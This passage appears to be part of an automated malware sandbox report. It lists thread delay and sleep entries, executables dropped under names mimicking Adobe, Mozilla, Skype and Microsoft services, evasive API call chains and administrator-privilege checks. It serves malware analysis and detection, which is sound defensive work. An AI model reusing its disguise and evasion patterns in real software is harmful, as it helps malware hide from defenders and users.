                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589724
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589599
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588984
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588765
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588578
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588390
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588226
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587873
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587640
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586594
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586375
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586109
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 584812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 584276
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583949
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583728
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583515
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583234
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582578
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581703
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581469
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581312
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581094
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580906
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580716
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580531
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580312
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579609
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579437
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579276
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579078
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578931
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578703
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578538
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578328
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578125
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577953
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577791
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577500
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577187
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576856
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576665
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576515
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575844
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575656
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575523
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575359
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574969
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574750
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574181
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573469
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573219
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572390
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572203
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572001
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571500
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570859
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570713
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570539
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569982
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569646
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569429
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569234
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567687
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567058
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 566874
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 566640
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 566406
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 566256
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 566062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 565875
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 565719
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 565565
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 565418
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 733Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 373Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWindow / User API: threadDelayed 450
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWindow / User API: threadDelayed 767
                      Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1947
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeWindow / User API: threadDelayed 486
                      Source: C:\Windows\System32\relog.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].packJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exeJump to dropped file
                      Source: C:\Windows\System32\relog.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].packJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Skype\Service_Skype.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeEvaded block: after key decisiongraph_0-14483
                      Source: C:\Windows\System32\relog.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeEvaded block: after key decision
                      Source: C:\Windows\System32\relog.exeEvaded block: after key decision
                      Source: C:\Windows\System32\relog.exeEvaded block: after key decision
                      Source: C:\Windows\System32\relog.exeEvaded block: after key decision
                      Source: C:\Windows\System32\relog.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\relog.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-14162
                      Source: C:\Windows\System32\relog.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-14424
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\explorer.exeAPI coverage: 8.5 %
                      Source: C:\Windows\System32\relog.exeAPI coverage: 3.3 %
                      Source: C:\Windows\System32\relog.exeAPI coverage: 3.3 %
                      Source: C:\Windows\System32\relog.exeAPI coverage: 3.3 %
                      Source: C:\Windows\explorer.exe TID: 1432Thread sleep time: -373000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 3748Thread sleep time: -720000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6216Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe TID: 7220Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe TID: 6900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -599781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -599562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -599125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -598929s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -598718s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -598515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -598140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -597953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -597781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -597621s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -597421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -597140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -596757s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -596578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -596390s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -596046s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -99445s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98954s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98418s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98090s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -97869s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -593578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -593296s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -593125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -99718s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -99453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -99093s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98718s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -98343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -591156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -590968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -590778s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -590593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -590375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -590078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -589656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -589479s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -589328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -589140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588993s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588600s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -588015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -587853s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -587560s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -587265s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -587125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -586961s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -586781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -586635s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -586421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -586218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -585984s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -585750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -585585s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -585421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -585031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -584812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -584515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -584203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -583843s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -583531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -583307s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -583112s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -582562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -582281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -582078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -581921s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -581687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -581423s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -581258s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -581046s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -580862s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -580671s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -580265s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -580077s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -579875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -579709s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -579492s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -579296s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -578953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -578484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -578078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -577734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -577484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -577341s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -577125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -576937s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -576703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -576468s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -576318s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -576125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -575937s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -575781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -575627s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -599641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -599359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -599031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -598495s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -598168s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -597947s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -597734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -597453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -597281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -597031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -199530s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -99125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98967s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98786s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -595184s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -594953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -594775s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -594615s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -99359s >= -30000s
